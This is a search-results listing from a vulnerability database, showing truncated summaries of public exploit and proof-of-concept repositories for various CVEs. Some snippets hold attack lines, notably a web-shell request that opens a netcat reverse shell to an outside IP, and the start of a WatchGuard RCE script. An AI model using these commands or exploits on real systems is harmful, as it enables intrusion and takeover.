Lucene search
+L

595644 matches found

Kitploit
Kitploit
added 2026/09/08 5:50 p.m.7 views

FinalRecon

Twitter - Telegram - Blog de thewhiteh4t FinalRecon es una herramienta automatizada de reconocimiento web todo en uno escrita en Python. El objetivo de FinalRecon es proporcionar una visión general del objetivo en un corto periodo de tiempo manteniendo la precisión de los resultados. En lugar de...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/08 5:39 p.m.9 views

CVE-2020-7471

CVE-2020-7471 SQL injection via StringAgg delimeter input Setup: Run ./setup.sh for initial setup Open the docker image to initiate the database: docker exec -it containerid /bin/bash And run the following commands: root@kitploit: python manage.py makemigrations vulapp python manage.py migrate...

9.8CVSS6.8AI score0.65575EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/08 5:38 p.m.6 views

CVE-2019-0211-exploit

CVE-2019-0211 — Apache HTTP Server Local Privilege Escalation CARPE DIEM Description CVE-2019-0211 is a local privilege escalation vulnerability affecting Apache HTTP Server between versions 2.4.17 and 2.4.38 using modprefork and modphp or PHP-FPM. The vulnerability allows an attacker with a shel...

7.8CVSS7.1AI score0.65005EPSS
SaveExploits8References3
Kitploit
Kitploit
added 2026/09/08 5:36 p.m.5 views

CVE-2024-10914__POC

CVE-2024-10914 - Proof of Concept Exploit for command injection vulnerability in the /cgi-bin/accountmgr.cgi endpoint. This vulnerability allows arbitrary command execution on the affected system through unsanitized parameters. Vulnerability Description CVE-2024-10914 is a command injection...

9.8CVSS8AI score0.96183EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/08 5:31 p.m.6 views

CVE-2020-27223

CVE-2020-27223 Using root@kitploit: $ mvn spring-boot:run 9.4.36.v20210114 root@kitploit: $ ./poc/cve-2020-27223-poc1.sh "timens":"58,557","acceptlanguage":"aab" real 0m0.093s 🐇 user 0m0.006s sys 0m0.007s "timens":"18,461,763,438","acceptlanguage":"ahn" real 0m35.339s 🐢 user 0m0.006s sys 0m0.006s...

5.3CVSS6.9AI score0.7795EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/08 5:24 p.m.2 views

CVE-2014-6271-Apache-Debian

CVE-2014-6271-Apache-Debian Overview This Repo is PoC environment of CVE-2014-6271. You can deploy web service including vulernability using apache2 container image. Preparation Image Build Build insecure image from Dockerfile. root@kitploit: docker build -t cve-2014-6271-apache-debian:buster...

10CVSS8.2AI score0.99999EPSS
SaveExploits146References2
Kitploit
Kitploit
added 2026/09/08 5:22 p.m.6 views

CVE-2020-13424

Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion Authenticated Date: 2020-05-10 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Exploit-Db Author ID: 8763 Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/ Vendor...

6.5CVSS6.6AI score0.01715EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/08 5:20 p.m.6 views

watchguard_cve-2022-26318

watchguardcve-2022-26318 Watchguard RCE POC CVE-2022-26318 !/usr/bin/python3 -- coding: utf-8 - - CVE-2022-26318 import socket import ssl import gzip Remote WatchGuard XTM or FireWare OS RHOST = "1.1.1.1" Local host with nc listener: nc -l 8.8.8.8 8888 LHOST = "8.8.8.8" def buildPayloadLHOST:...

9.8CVSS8.4AI score0.78157EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/08 5:19 p.m.9 views

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation Hands‑on analysis of CVE‑2025‑62215, a Windows Kernel race condition exploited in the wild. Demonstrates privilege escalation to SYSTEM, detection scripts, and patch validation strategies for enterprise defenders and red...

7CVSS7.3AI score0.05985EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/08 5:18 p.m.6 views

CVE-2020-7247-reproducer

CVE-2020-7247 OpenSMTPD Information This repository contains necessary files to build a Docker image that contains a vulnerable environment of OpenSMTPD 6.6.1p1. The vulnerability allows an attacker to execute arbitrary commands through a specially crafted SMTP session, specifically in the MAIL...

10CVSS8AI score0.98972EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/08 5:14 p.m.6 views

CVE-2022-29078

CVE-2022-29078 vuln ejs 3.1.6 docker Setup root@kitploit: git clone https://github.com/miko550/CVE-2022-29078.git cd CVE-2022-29078 docker build . -t miko/vuln-ejs docker run -p 49160:8080 -d --name vuln-ejs miko/vuln-ejs Usage root@kitploit: http://127.0.0.1:49160/ Exploit In browser...

9.8CVSS7.2AI score0.32808EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/08 5:13 p.m.6 views

cve-2021-42013.get

Apache 2.4.50 - Path Traversal or Remote Code Execution cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50. Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-42013 If CGI-BIN is enabled...

9.8CVSS8.3AI score0.99964EPSS
SaveExploits190
Kitploit
Kitploit
added 2026/09/08 5:12 p.m.4 views

cve-2021-42013

Apache 2.4.50 - Path Traversal or Remote Code Execution cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50. Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-42013 If CGI-BIN is enabled...

9.8CVSS8.2AI score0.99964EPSS
SaveExploits190
Kitploit
Kitploit
added 2026/09/08 5:12 p.m.4 views

CVE-2021-41773S

Vulnerable docker images for CVE-2021-41773 Apache path traversal This vulnerabiltiy only applies to version 2.4.49 that have specific non-default configs. In certain situations this can result in either file read or code execution. https://twitter.com/ptswarm/status/1445376079548624899 Vulnerabl...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits164
Kitploit
Kitploit
added 2026/09/08 5:12 p.m.6 views

CVE-2021-41773-PoC

CVE-2021-41773-PoC PoC for CVE-2021-41773 with docker to demonstrate Run Just run ./poc.sh. Make sure you have working docker and docker-compose root@kitploit: $ ./poc.sh Creating network "cve-2021-41773-pocdefault" with the default driver Creating cve-2021-41773-pocweb1 ... done...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits164
Kitploit
Kitploit
added 2026/09/08 5:09 p.m.5 views

CVE-2026-31024

CVE-2026-31024 Vulnerability Report: Steghide Stack-Based Buffer Overflow & Information Disclosure Field| Value ---|--- Target Application| Steghide Linux Binary Affected Version| 0.5.1 Confirmed; earlier versions likely affected Vulnerability Type| Stack-Based Buffer Overflow CWE-121 Impact|...

6.4AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/08 5:09 p.m.6 views

Dirty-Frag-CVE-2026-43284

DirtyFrag CVE-2026-43284 - Lab Detection Exercise Report Classification: Internal Lab - CyberLAB Date: 24 May 2026 Platform: Elastic Stack v9.4.1 Status: Detection Confirmed Table of Contents A - Executive Summary B - Full Findings Report 1. Objective and Threat Model 2. Vulnerability Background...

8.8CVSS7.2AI score0.93235EPSS
SaveExploits32References1
Kitploit
Kitploit
added 2026/09/08 5:08 p.m.6 views

gitlist-RCE

gitlist-RCE CVE-2014-4511 example: after shell upload successfully: access: http://192.168.1.126/cache/x.php/?cmd=nc -nv 192.168.1.127 1111 -e /bin/sh http://192.168.1.126/cache/x.php/?cmd=nc%20-nv%20192.168.1.127%201111%20-e%20/bin/sh...

7.5CVSS5.9AI score0.8273EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/08 5:02 p.m.6 views

mxc

Microsoft eXecution Container MXC MXC is a sandboxed code execution system for running untrusted code model output, plugins, tools on Windows, Linux, and macOS. It provides multiple containment backends — from OS-native process sandboxes to full VMs — behind a unified JSON configuration schema an...

6AI score
SaveExploits0References11
Kitploit
Kitploit
added 2026/09/08 5:00 p.m.4 views

WebKit-Bug-256172

WebKit-Bug-256172 Safari 1day RCE Exploit, might be patched in iOS 16.5.1/macOS 13.4.1 Confirmed exploit works on macOS 13.3.1, iOS 15.8.2. Description Currently only works on macOS 13.0.1 x8664 due to hardcoded offsets. Implemented addrof/fakeobj, r/w primitive Patch...

8.8CVSS7.9AI score0.1895EPSS
SaveExploits0References2
Rows per page
Query Builder